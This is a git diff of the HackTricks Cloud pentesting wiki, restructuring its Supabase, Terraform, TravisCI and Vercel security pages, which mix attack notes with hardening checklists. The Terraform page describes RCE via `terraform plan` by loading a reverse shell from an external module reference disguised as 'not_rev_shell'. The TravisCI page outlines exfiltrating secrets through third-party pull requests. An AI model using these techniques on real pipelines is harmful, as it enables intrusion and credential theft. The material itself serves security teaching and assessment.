-{% endhint %} +{{#include ../banners/hacktricks-training.md}} diff --git a/pentesting-ci-cd/supabase-security.md b/src/pentesting-ci-cd/supabase-security.md similarity index 62% rename from pentesting-ci-cd/supabase-security.md rename to src/pentesting-ci-cd/supabase-security.md index 3dda14511..40231a605 100644 --- a/pentesting-ci-cd/supabase-security.md +++ b/src/pentesting-ci-cd/supabase-security.md @@ -1,19 +1,6 @@ # Supabase Security -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../banners/hacktricks-training.md}} ## Basic Information @@ -25,9 +12,8 @@ Basically when a project is created, the user will receive a supabase.co subdoma ## **Database configuration** -{% hint style="success" %} -**This data can be accessed from a link like `https://supabase.com/dashboard/project//settings/database`** -{% endhint %} +> [!TIP] +> **This data can be accessed from a link like `https://supabase.com/dashboard/project//settings/database`** This **database** will be deployed in some AWS region, and in order to connect to it it would be possible to do so connecting to: `postgres://postgres.jnanozjdybtpqgcwhdiz:[YOUR-PASSWORD]@aws-0-us-west-1.pooler.supabase.com:5432/postgres` (this was crated in us-west-1).\ The password is a **password the user put** previously. @@ -36,17 +22,16 @@ Therefore, as the subdomain is a known one and it's used as username and the AWS This section also contains options to: -* Reset the database password -* Configure connection pooling -* Configure SSL: Reject plan-text connections (by default they are enabled) -* Configure Disk size -* Apply network restrictions and bans +- Reset the database password +- Configure connection pooling +- Configure SSL: Reject plan-text connections (by default they are enabled) +- Configure Disk size +- Apply network restrictions and bans ## API Configuration -{% hint style="success" %} -**This data can be accessed from a link like `https://supabase.com/dashboard/project//settings/api`** -{% endhint %} +> [!TIP] +> **This data can be accessed from a link like `https://supabase.com/dashboard/project//settings/api`** The URL to access the supabase API in your project is going to be like: `https://jnanozjdybtpqgcwhdiz.supabase.co`. @@ -120,7 +105,7 @@ Priority: u=1, i So, whenever you discover a client using supabase with the subdomain they were granted (it's possible that a subdomain of the company has a CNAME over their supabase subdomain), you might try to **create a new account in the platform using the supabase API**. -### secret / service\_role api keys +### secret / service_role api keys A secret API key will also be generated with **`role: "service_role"`**. This API key should be secret because it will be able to bypass **Row Level Security**. @@ -134,22 +119,21 @@ A **JWT Secret** will also be generate so the application can **create and sign ### Signups -{% hint style="success" %} -By **default** supabase will allow **new users to create accounts** on your project by using the previously mentioned API endpoints. -{% endhint %} +> [!TIP] +> By **default** supabase will allow **new users to create accounts** on your project by using the previously mentioned API endpoints. However, these new accounts, by default, **will need to validate their email address** to be able to login into the account. It's possible to enable **"Allow anonymous sign-ins"** to allow people to login without verifying their email address. This could grant access to **unexpected data** (they get the roles `public` and `authenticated`).\ This is a very bad idea because supabase charges per active user so people could create users and login and supabase will charge for those: -
+
### Passwords & sessions It's possible to indicate the minimum password length (by default), requirements (no by default) and disallow to use leaked passwords.\ It's recommended to **improve the requirements as the default ones are weak**. -* User Sessions: It's possible to configure how user sessions work (timeouts, 1 session per user...) -* Bot and Abuse Protection: It's possible to enable Captcha. +- User Sessions: It's possible to configure how user sessions work (timeouts, 1 session per user...) +- Bot and Abuse Protection: It's possible to enable Captcha. ### SMTP Settings @@ -157,37 +141,23 @@ It's possible to set an SMTP to send emails. ### Advanced Settings -* Set expire time to access tokens (3600 by default) -* Set to detect and revoke potentially compromised refresh tokens and timeout -* MFA: Indicate how many MFA factors can be enrolled at once per user (10 by default) -* Max Direct Database Connections: Max number of connections used to auth (10 by default) -* Max Request Duration: Maximum time allowed for an Auth request to last (10s by default) +- Set expire time to access tokens (3600 by default) +- Set to detect and revoke potentially compromised refresh tokens and timeout +- MFA: Indicate how many MFA factors can be enrolled at once per user (10 by default) +- Max Direct Database Connections: Max number of connections used to auth (10 by default) +- Max Request Duration: Maximum time allowed for an Auth request to last (10s by default) ## Storage -{% hint style="success" %} -Supabase allows **to store files** and make them accesible over a URL (it uses S3 buckets). -{% endhint %} +> [!TIP] +> Supabase allows **to store files** and make them accesible over a URL (it uses S3 buckets). -* Set the upload file size limit (default is 50MB) -* The S3 connection is given with a URL like: `https://jnanozjdybtpqgcwhdiz.supabase.co/storage/v1/s3` -* It's possible to **request S3 access key** that are formed by an `access key ID` (e.g. `a37d96544d82ba90057e0e06131d0a7b`) and a `secret access key` (e.g. `58420818223133077c2cec6712a4f909aec93b4daeedae205aa8e30d5a860628`) +- Set the upload file size limit (default is 50MB) +- The S3 connection is given with a URL like: `https://jnanozjdybtpqgcwhdiz.supabase.co/storage/v1/s3` +- It's possible to **request S3 access key** that are formed by an `access key ID` (e.g. `a37d96544d82ba90057e0e06131d0a7b`) and a `secret access key` (e.g. `58420818223133077c2cec6712a4f909aec93b4daeedae205aa8e30d5a860628`) ## Edge Functions It's possible to **store secrets** in supabase also which will be **accessible by edge functions** (the can be created and deleted from the web, but it's not possible to access their value directly). -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../banners/hacktricks-training.md}} diff --git a/pentesting-ci-cd/terraform-security.md b/src/pentesting-ci-cd/terraform-security.md similarity index 72% rename from pentesting-ci-cd/terraform-security.md rename to src/pentesting-ci-cd/terraform-security.md index 5cf8b2650..9f7047a30 100644 --- a/pentesting-ci-cd/terraform-security.md +++ b/src/pentesting-ci-cd/terraform-security.md @@ -1,19 +1,6 @@ # Terraform Security -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../banners/hacktricks-training.md}} ## Basic Information @@ -25,17 +12,17 @@ HashiCorp Terraform is an **infrastructure as code tool** that lets you define b Terraform creates and manages resources on cloud platforms and other services through their application programming interfaces (APIs). Providers enable Terraform to work with virtually any platform or service with an accessible API. -![](<../.gitbook/assets/image (177).png>) +![](<../images/image (177).png>) HashiCorp and the Terraform community have already written **more than 1700 providers** to manage thousands of different types of resources and services, and this number continues to grow. You can find all publicly available providers on the [Terraform Registry](https://registry.terraform.io/), including Amazon Web Services (AWS), Azure, Google Cloud Platform (GCP), Kubernetes, Helm, GitHub, Splunk, DataDog, and many more. The core Terraform workflow consists of three stages: -* **Write:** You define resources, which may be across multiple cloud providers and services. For example, you might create a configuration to deploy an application on virtual machines in a Virtual Private Cloud (VPC) network with security groups and a load balancer. -* **Plan:** Terraform creates an execution plan describing the infrastructure it will create, update, or destroy based on the existing infrastructure and your configuration. -* **Apply:** On approval, Terraform performs the proposed operations in the correct order, respecting any resource dependencies. For example, if you update the properties of a VPC and change the number of virtual machines in that VPC, Terraform will recreate the VPC before scaling the virtual machines. +- **Write:** You define resources, which may be across multiple cloud providers and services. For example, you might create a configuration to deploy an application on virtual machines in a Virtual Private Cloud (VPC) network with security groups and a load balancer. +- **Plan:** Terraform creates an execution plan describing the infrastructure it will create, update, or destroy based on the existing infrastructure and your configuration. +- **Apply:** On approval, Terraform performs the proposed operations in the correct order, respecting any resource dependencies. For example, if you update the properties of a VPC and change the number of virtual machines in that VPC, Terraform will recreate the VPC before scaling the virtual machines. -![](<../.gitbook/assets/image (215).png>) +![](<../images/image (215).png>) ### Terraform Lab @@ -53,9 +40,9 @@ The main way for an attacker to be able to compromise the system where terraform Actually, there are solutions out there that **execute terraform plan/apply automatically after a PR** is created, such as **Atlantis**: -{% content-ref url="atlantis-security.md" %} -[atlantis-security.md](atlantis-security.md) -{% endcontent-ref %} +{{#ref}} +atlantis-security.md +{{#endref}} If you are able to compromise a terraform file there are different ways you can perform RCE when someone executed `terraform plan` or `terraform apply`. @@ -100,7 +87,7 @@ You can find an example in [https://github.com/rung/terraform-provider-cmdexec]( Both mentioned options are useful but not very stealthy (the second is more stealthy but more complex than the first one). You can perform this attack even in a **stealthier way**, by following this suggestions: -* Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell: +- Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell: ```javascript module "not_rev_shell" { @@ -108,9 +95,9 @@ module "not_rev_shell" { } ``` -You can find the rev shell code in [https://github.com/carlospolop/terraform\_external\_module\_rev\_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules) +You can find the rev shell code in [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules) -* In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b` +- In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b` ### Terraform Apply @@ -223,12 +210,12 @@ data "external" "example" { Snyk offers a comprehensive Infrastructure as Code (IaC) scanning solution that detects vulnerabilities and misconfigurations in Terraform, CloudFormation, Kubernetes, and other IaC formats. -* **Features:** - * Real-time scanning for security vulnerabilities and compliance issues. - * Integration with version control systems (GitHub, GitLab, Bitbucket). - * Automated fix pull requests. - * Detailed remediation advice. -* **Sign Up:** Create an account on [Snyk](https://snyk.io/). +- **Features:** + - Real-time scanning for security vulnerabilities and compliance issues. + - Integration with version control systems (GitHub, GitLab, Bitbucket). + - Automated fix pull requests. + - Detailed remediation advice. +- **Sign Up:** Create an account on [Snyk](https://snyk.io/). ```bash brew tap snyk/tap @@ -254,16 +241,15 @@ checkov -d /path/to/folder From the [**docs**](https://github.com/terraform-compliance/cli): `terraform-compliance` is a lightweight, security and compliance focused test framework against terraform to enable negative testing capability for your infrastructure-as-code. -* **compliance:** Ensure the implemented code is following security standards, your own custom standards -* **behaviour driven development:** We have BDD for nearly everything, why not for IaC ? -* **portable:** just install it from `pip` or run it via `docker`. See [Installation](https://terraform-compliance.com/pages/installation/) -* **pre-deploy:** it validates your code before it is deployed -* **easy to integrate:** it can run in your pipeline (or in git hooks) to ensure all deployments are validated. -* **segregation of duty:** you can keep your tests in a different repository where a separate team is responsible. +- **compliance:** Ensure the implemented code is following security standards, your own custom standards +- **behaviour driven development:** We have BDD for nearly everything, why not for IaC ? +- **portable:** just install it from `pip` or run it via `docker`. See [Installation](https://terraform-compliance.com/pages/installation/) +- **pre-deploy:** it validates your code before it is deployed +- **easy to integrate:** it can run in your pipeline (or in git hooks) to ensure all deployments are validated. +- **segregation of duty:** you can keep your tests in a different repository where a separate team is responsible. -{% hint style="info" %} -Unfortunately if the code is using some providers you don't have access to you won't be able to perform the `terraform plan` and run this tool. -{% endhint %} +> [!NOTE] +> Unfortunately if the code is using some providers you don't have access to you won't be able to perform the `terraform plan` and run this tool. ```bash pip install terraform-compliance @@ -275,17 +261,17 @@ terraform-compliance -f /path/to/folder From the [**docs**](https://github.com/aquasecurity/tfsec): tfsec uses static analysis of your terraform code to spot potential misconfigurations. -* ☁️ Checks for misconfigurations across all major (and some minor) cloud providers -* ⛔ Hundreds of built-in rules -* 🪆 Scans modules (local and remote) -* ➕ Evaluates HCL expressions as well as literal values -* ↪️ Evaluates Terraform functions e.g. `concat()` -* 🔗 Evaluates relationships between Terraform resources -* 🧰 Compatible with the Terraform CDK -* 🙅 Applies (and embellishes) user-defined Rego policies -* 📃 Supports multiple output formats: lovely (default), JSON, SARIF, CSV, CheckStyle, JUnit, text, Gif. -* 🛠️ Configurable (via CLI flags and/or config file) -* ⚡ Very fast, capable of quickly scanning huge repositories +- ☁️ Checks for misconfigurations across all major (and some minor) cloud providers +- ⛔ Hundreds of built-in rules +- 🪆 Scans modules (local and remote) +- ➕ Evaluates HCL expressions as well as literal values +- ↪️ Evaluates Terraform functions e.g. `concat()` +- 🔗 Evaluates relationships between Terraform resources +- 🧰 Compatible with the Terraform CDK +- 🙅 Applies (and embellishes) user-defined Rego policies +- 📃 Supports multiple output formats: lovely (default), JSON, SARIF, CSV, CheckStyle, JUnit, text, Gif. +- 🛠️ Configurable (via CLI flags and/or config file) +- ⚡ Very fast, capable of quickly scanning huge repositories ```bash brew install tfsec @@ -306,11 +292,11 @@ docker run -t -v $(pwd):/path checkmarx/kics:latest scan -p /path -o "/path/" From the [**docs**](https://github.com/tenable/terrascan): Terrascan is a static code analyzer for Infrastructure as Code. Terrascan allows you to: -* Seamlessly scan infrastructure as code for misconfigurations. -* Monitor provisioned cloud infrastructure for configuration changes that introduce posture drift, and enables reverting to a secure posture. -* Detect security vulnerabilities and compliance violations. -* Mitigate risks before provisioning cloud native infrastructure. -* Offers flexibility to run locally or integrate with your CI\CD. +- Seamlessly scan infrastructure as code for misconfigurations. +- Monitor provisioned cloud infrastructure for configuration changes that introduce posture drift, and enables reverting to a secure posture. +- Detect security vulnerabilities and compliance violations. +- Mitigate risks before provisioning cloud native infrastructure. +- Offers flexibility to run locally or integrate with your CI\CD. ```bash brew install terrascan @@ -318,22 +304,9 @@ brew install terrascan ## References -* [Atlantis Security](atlantis-security.md) -* [https://alex.kaskaso.li/post/terraform-plan-rce](https://alex.kaskaso.li/post/terraform-plan-rce) -* [https://developer.hashicorp.com/terraform/intro](https://developer.hashicorp.com/terraform/intro) -* [https://blog.plerion.com/hacking-terraform-state-privilege-escalation/](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) +- [Atlantis Security](atlantis-security.md) +- [https://alex.kaskaso.li/post/terraform-plan-rce](https://alex.kaskaso.li/post/terraform-plan-rce) +- [https://developer.hashicorp.com/terraform/intro](https://developer.hashicorp.com/terraform/intro) +- [https://blog.plerion.com/hacking-terraform-state-privilege-escalation/](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../banners/hacktricks-training.md}} diff --git a/src/pentesting-ci-cd/todo.md b/src/pentesting-ci-cd/todo.md new file mode 100644 index 000000000..7b1c48cfb --- /dev/null +++ b/src/pentesting-ci-cd/todo.md @@ -0,0 +1,16 @@ +# TODO + +{{#include ../banners/hacktricks-training.md}} + +Github PRs are welcome explaining how to (ab)use those platforms from an attacker perspective + +- Drone +- TeamCity +- BuildKite +- OctopusDeploy +- Rancher +- Mesosphere +- Radicle +- Any other CI/CD platform... + +{{#include ../banners/hacktricks-training.md}} diff --git a/src/pentesting-ci-cd/travisci-security/README.md b/src/pentesting-ci-cd/travisci-security/README.md new file mode 100644 index 000000000..93e22e2f4 --- /dev/null +++ b/src/pentesting-ci-cd/travisci-security/README.md @@ -0,0 +1,65 @@ +# TravisCI Security + +{{#include ../../banners/hacktricks-training.md}} + +## What is TravisCI + +**Travis CI** is a **hosted** or on **premises** **continuous integration** service used to build and test software projects hosted on several **different git platform**. + +{{#ref}} +basic-travisci-information.md +{{#endref}} + +## Attacks + +### Triggers + +To launch an attack you first need to know how to trigger a build. By default TravisCI will **trigger a build on pushes and pull requests**: + +![](<../../images/image (145).png>) + +#### Cron Jobs + +If you have access to the web application you can **set crons to run the build**, this could be useful for persistence or to trigger a build: + +![](<../../images/image (243).png>) + +> [!NOTE] +> It looks like It's not possible to set crons inside the `.travis.yml` according to [this](https://github.com/travis-ci/travis-ci/issues/9162). + +### Third Party PR + +TravisCI by default disables sharing env variables with PRs coming from third parties, but someone might enable it and then you could create PRs to the repo and exfiltrate the secrets: + +![](<../../images/image (208).png>) + +### Dumping Secrets + +As explained in the [**basic information**](basic-travisci-information.md) page, there are 2 types of secrets. **Environment Variables secrets** (which are listed in the web page) and **custom encrypted secrets**, which are stored inside the `.travis.yml` file as base64 (note that both as stored encrypted will end as env variables in the final machines). + +- To **enumerate secrets** configured as **Environment Variables** go to the **settings** of the **project** and check the list. However, note that all the project env variables set here will appear when triggering a build. +- To enumerate the **custom encrypted secrets** the best you can do is to **check the `.travis.yml` file**. +- To **enumerate encrypted files** you can check for **`.enc` files** in the repo, for lines similar to `openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d` in the config file, or for **encrypted iv and keys** in the **Environment Variables** such as: + +![](<../../images/image (81).png>) + +### TODO: + +- Example build with reverse shell running on Windows/Mac/Linux +- Example build leaking the env base64 encoded in the logs + +### TravisCI Enterprise + +If an attacker ends in an environment which uses **TravisCI enterprise** (more info about what this is in the [**basic information**](basic-travisci-information.md#travisci-enterprise)), he will be able to **trigger builds in the the Worker.** This means that an attacker will be able to move laterally to that server from which he could be able to: + +- escape to the host? +- compromise kubernetes? +- compromise other machines running in the same network? +- compromise new cloud credentials? + +## References + +- [https://docs.travis-ci.com/user/encrypting-files/](https://docs.travis-ci.com/user/encrypting-files/) +- [https://docs.travis-ci.com/user/best-practices-security](https://docs.travis-ci.com/user/best-practices-security) + +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-ci-cd/travisci-security/basic-travisci-information.md b/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md similarity index 60% rename from pentesting-ci-cd/travisci-security/basic-travisci-information.md rename to src/pentesting-ci-cd/travisci-security/basic-travisci-information.md index 1b24db9bd..deba53bfa 100644 --- a/pentesting-ci-cd/travisci-security/basic-travisci-information.md +++ b/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md @@ -1,19 +1,6 @@ # Basic TravisCI Information -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} ## Access @@ -21,9 +8,9 @@ TravisCI directly integrates with different git platforms such as Github, Bitbuc For example, in Github it will ask for the following permissions: -* `user:email` (read-only) -* `read:org` (read-only) -* `repo`: Grants read and write access to code, commit statuses, collaborators, and deployment statuses for public and private repositories and organizations. +- `user:email` (read-only) +- `read:org` (read-only) +- `repo`: Grants read and write access to code, commit statuses, collaborators, and deployment statuses for public and private repositories and organizations. ## Encrypted Secrets @@ -31,7 +18,7 @@ For example, in Github it will ask for the following permissions: In TravisCI, as in other CI platforms, it's possible to **save at repo level secrets** that will be saved encrypted and be **decrypted and push in the environment variable** of the machine executing the build. -![](<../../.gitbook/assets/image (203).png>) +![](<../../images/image (203).png>) It's possible to indicate the **branches to which the secrets are going to be available** (by default all) and also if TravisCI **should hide its value** if it appears **in the logs** (by default it will). @@ -48,7 +35,7 @@ travis pubkey -r carlospolop/t-ci-test Then, you can use this setup to **encrypt secrets and add them to your `.travis.yaml`**. The secrets will be **decrypted when the build is run** and accessible in the **environment variables**. -![](<../../.gitbook/assets/image (139).png>) +![](<../../images/image (139).png>) Note that the secrets encrypted this way won't appear listed in the environmental variables of the settings. @@ -76,7 +63,7 @@ Commit all changes to your .travis.yml. Note that when encrypting a file 2 Env Variables will be configured inside the repo such as: -![](<../../.gitbook/assets/image (170).png>) +![](<../../images/image (170).png>) ## TravisCI Enterprise @@ -100,19 +87,6 @@ Travis CI Enterprise is an **on-prem version of Travis CI**, which you can deplo The amount of deployed TCI Worker and build environment OS images will determine the total concurrent capacity of Travis CI Enterprise deployment in your infrastructure. -![](<../../.gitbook/assets/image (199).png>) +![](<../../images/image (199).png>) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-ci-cd/vercel-security.md b/src/pentesting-ci-cd/vercel-security.md new file mode 100644 index 000000000..b9a1deb16 --- /dev/null +++ b/src/pentesting-ci-cd/vercel-security.md @@ -0,0 +1,437 @@ +# Vercel + +{{#include ../banners/hacktricks-training.md}} + +## Basic Information + +In Vercel a **Team** is the complete **environment** that belongs a client and a **project** is an **application**. + +For a hardening review of **Vercel** you need to ask for a user with **Viewer role permission** or at least **Project viewer permission over the projects** to check (in case you only need to check the projects and not the Team configuration also). + +## Project Settings + +### General + +**Purpose:** Manage fundamental project settings such as project name, framework, and build configurations. + +#### Security Configurations: + +- **Transfer** + - **Misconfiguration:** Allows to transfer the project to another team + - **Risk:** An attacker could steal the project +- **Delete Project** + - **Misconfiguration:** Allows to delete the project + - **Risk:** Delete the prject + +--- + +### Domains + +**Purpose:** Manage custom domains, DNS settings, and SSL configurations. + +#### Security Configurations: + +- **DNS Configuration Errors** + - **Misconfiguration:** Incorrect DNS records (A, CNAME) pointing to malicious servers. + - **Risk:** Domain hijacking, traffic interception, and phishing attacks. +- **SSL/TLS Certificate Management** + - **Misconfiguration:** Using weak or expired SSL/TLS certificates. + - **Risk:** Vulnerable to man-in-the-middle (MITM) attacks, compromising data integrity and confidentiality. +- **DNSSEC Implementation** + - **Misconfiguration:** Failing to enable DNSSEC or incorrect DNSSEC settings. + - **Risk:** Increased susceptibility to DNS spoofing and cache poisoning attacks. +- **Environment used per domain** + - **Misconfiguration:** Change the environment used by the domain in production. + - **Risk:** Expose potential secrets or functionalities taht shouldn't be available in production. + +--- + +### Environments + +**Purpose:** Define different environments (Development, Preview, Production) with specific settings and variables. + +#### Security Configurations: + +- **Environment Isolation** + - **Misconfiguration:** Sharing environment variables across environments. + - **Risk:** Leakage of production secrets into development or preview environments, increasing exposure. +- **Access to Sensitive Environments** + - **Misconfiguration:** Allowing broad access to production environments. + - **Risk:** Unauthorized changes or access to live applications, leading to potential downtimes or data breaches. + +--- + +### Environment Variables + +**Purpose:** Manage environment-specific variables and secrets used by the application. + +#### Security Configurations: + +- **Exposing Sensitive Variables** + - **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side. + - **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches. +- **Sensitive disabled** + - **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets. + - **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information. +- **Shared Environment Variables** + - **Misconfiguration:** These are env variables set at Team level and could also contain sensitive information. + - **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information. + +--- + +### Git + +**Purpose:** Configure Git repository integrations, branch protections, and deployment triggers. + +#### Security Configurations: + +- **Ignored Build Step (TODO)** + - **Misconfiguration:** It looks like this option allows to configure a bash script/commands that will be executed when a new commit is pushed in Github, which could allow RCE. + - **Risk:** TBD + +--- + +### Integrations + +**Purpose:** Connect third-party services and tools to enhance project functionalities. + +#### Security Configurations: + +- **Insecure Third-Party Integrations** + - **Misconfiguration:** Integrating with untrusted or insecure third-party services. + - **Risk:** Introduction of vulnerabilities, data leaks, or backdoors through compromised integrations. +- **Over-Permissioned Integrations** + - **Misconfiguration:** Granting excessive permissions to integrated services. + - **Risk:** Unauthorized access to project resources, data manipulation, or service disruptions. +- **Lack of Integration Monitoring** + - **Misconfiguration:** Failing to monitor and audit third-party integrations. + - **Risk:** Delayed detection of compromised integrations, increasing the potential impact of security breaches. + +--- + +### Deployment Protection + +**Purpose:** Secure deployments through various protection mechanisms, controlling who can access and deploy to your environments. + +#### Security Configurations: + +**Vercel Authentication** + +- **Misconfiguration:** Disabling authentication or not enforcing team member checks. +- **Risk:** Unauthorized users can access deployments, leading to data breaches or application misuse. + +**Protection Bypass for Automation** + +- **Misconfiguration:** Exposing the bypass secret publicly or using weak secrets. +- **Risk:** Attackers can bypass deployment protections, accessing and manipulating protected deployments. + +**Shareable Links** + +- **Misconfiguration:** Sharing links indiscriminately or failing to revoke outdated links. +- **Risk:** Unauthorized access to protected deployments, bypassing authentication and IP restrictions. + +**OPTIONS Allowlist** + +- **Misconfiguration:** Allowlisting overly broad paths or sensitive endpoints. +- **Risk:** Attackers can exploit unprotected paths to perform unauthorized actions or bypass security checks. + +**Password Protection** + +- **Misconfiguration:** Using weak passwords or sharing them insecurely. +- **Risk:** Unauthorized access to deployments if passwords are guessed or leaked. +- **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month. + +**Deployment Protection Exceptions** + +- **Misconfiguration:** Adding production or sensitive domains to the exception list inadvertently. +- **Risk:** Exposure of critical deployments to the public, leading to data leaks or unauthorized access. +- **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month. + +**Trusted IPs** + +- **Misconfiguration:** Incorrectly specifying IP addresses or CIDR ranges. +- **Risk:** Legitimate users being blocked or unauthorized IPs gaining access. +- **Note:** Available on the **Enterprise** plan. + +--- + +### Functions + +**Purpose:** Configure serverless functions, including runtime settings, memory allocation, and security policies. + +#### Security Configurations: + +- **Nothing** + +--- + +### Data Cache + +**Purpose:** Manage caching strategies and settings to optimize performance and control data storage. + +#### Security Configurations: + +- **Purge Cache** + - **Misconfiguration:** It allows to delete all the cache. + - **Risk:** Unauthorized users deleting the cache leading to a potential DoS. + +--- + +### Cron Jobs + +**Purpose:** Schedule automated tasks and scripts to run at specified intervals. + +#### Security Configurations: + +- **Disable Cron Job** + - **Misconfiguration:** It allows to disable cron jobs declared inside the code + - **Risk:** Potential interruption of the service (depending on what the cron jobs were meant for) + +--- + +### Log Drains + +**Purpose:** Configure external logging services to capture and store application logs for monitoring and auditing. + +#### Security Configurations: + +- Nothing (managed from teams settings) + +--- + +### Security + +**Purpose:** Central hub for various security-related settings affecting project access, source protection, and more. + +#### Security Configurations: + +**Build Logs and Source Protection** + +- **Misconfiguration:** Disabling protection or exposing `/logs` and `/src` paths publicly. +- **Risk:** Unauthorized access to build logs and source code, leading to information leaks and potential exploitation of vulnerabilities. + +**Git Fork Protection** + +- **Misconfiguration:** Allowing unauthorized pull requests without proper reviews. +- **Risk:** Malicious code can be merged into the codebase, introducing vulnerabilities or backdoors. + +**Secure Backend Access with OIDC Federation** + +- **Misconfiguration:** Incorrectly setting up OIDC parameters or using insecure issuer URLs. +- **Risk:** Unauthorized access to backend services through flawed authentication flows. + +**Deployment Retention Policy** + +- **Misconfiguration:** Setting retention periods too short (losing deployment history) or too long (unnecessary data retention). +- **Risk:** Inability to perform rollbacks when needed or increased risk of data exposure from old deployments. + +**Recently Deleted Deployments** + +- **Misconfiguration:** Not monitoring deleted deployments or relying solely on automated deletions. +- **Risk:** Loss of critical deployment history, hindering audits and rollbacks. + +--- + +### Advanced 